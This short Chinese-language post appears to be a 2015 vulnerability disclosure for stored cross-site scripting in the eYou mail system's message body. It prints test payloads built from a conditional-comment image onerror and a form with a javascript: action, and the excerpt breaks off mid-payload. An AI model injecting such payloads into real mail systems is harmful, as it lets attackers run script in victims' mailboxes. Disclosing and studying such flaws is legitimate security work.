eYou邮件系统邮件正文存储型XSS(HTML5特性并需点击)

admin 发布于 2015-02-11 05:00
由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。 测试代码: <!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><inp...